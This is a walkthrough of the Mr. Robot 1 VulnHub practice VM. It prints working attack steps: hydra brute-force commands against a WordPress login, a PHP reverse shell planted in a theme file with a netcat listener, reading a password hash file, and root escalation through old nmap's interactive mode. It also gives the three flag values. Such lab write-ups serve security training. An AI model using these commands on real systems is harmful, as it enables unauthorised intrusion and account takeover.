Mr-Robot 1

This is my writeup for the Mr. Robot 1 VM from vulnhub.com. Based on the show, Mr. Robot. This VM has three keys hidden in different locations. The goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Intelligence Gathering

When we access the IP of the VM on port 80, we see kind of a website.

Analysis

The goal is to find the three hidden keys, so let's start scanning:
I run my own recon script, which contains nmap and nikto:

Recon

Exploitation

key-1-of-3

Nikto found the robots.txt
$ curl http://__IP__/robots.txt

Content of robots.txt:
User-agent: *
fsocity.dic
key-1-of-3.txt

And that's the first key:
$ curl http://__IP__/key-1-of-3.txt
=> 073403c8a58a1f80d943455fb30724b9

key-2-of-3

Further nikto found a wordpress instance and a dictionary. Using hydra we bruteforce user and password.
Find a matching user using fsocity.dic

hydra -vV -L fsocity.dic -p password __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Find a matching password using fsocity.dic

hydra -vV -l elliot -P fsoprcity.dic __IP__ http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

With these credentials we're able to log in into the wordpress installation.

Placing a reverse shell

I logged into wordpress and put an edited version of the php rev_shell into header.php

Reverse shell

I then started a listener on port 42 on my local machine.
nc -lvp 42

Then I kicked the reverse shell:
curl http://__IP__/wp-content/themes/twentyfifteen/header.php

Let's wait for reverse shell to connect:

Connection from __IP__ 42814 received!
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 11:29:01 up 11 min,  1 user,  load average: 0.00, 0.03, 0.05
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
robot    tty1                      11:21    7:36   0.07s  0.01s -bash
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$

Fiddled around... then I found and read /home/robot/password.raw-md5

robot:c3fcd3d76192e4007dfb496cca67e13b
robot:abcdefghijklmnopqrstuvwxyz

Then spawn a tty shell using python:

python -c 'import pty; pty.spawn("/bin/sh")'

Change user

su robot

Read home/robot/key-2-of-3.txt

[email protected]:~$ ls
ls
key-2-of-3.txt	password.raw-md5
[email protected]:~$ cat key-2-of-3.txt
cat key-2-of-3.txt

And that's key 2:
=> 822c73956184f694993bede3eb39f959

key-3-of-3

Now we obviously need to get root. We start by searching for binaries with the SUID bit set:

find / -perm -4000 -type f 2>/dev/null

suid

[email protected]:/$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )

This looks like an old version of nmap. There's that cool feature called interactive mode.

nmap --interactive
nmap> !sh

Now we're root. Let's read the final key.

cat /root/key-3-of-3.txt

=> 04787ddef27c3dee1ee161b21670b4e4

Learnings

I didn't know about the interactive mode of nmap.

vulnhub writeup spoiler oscp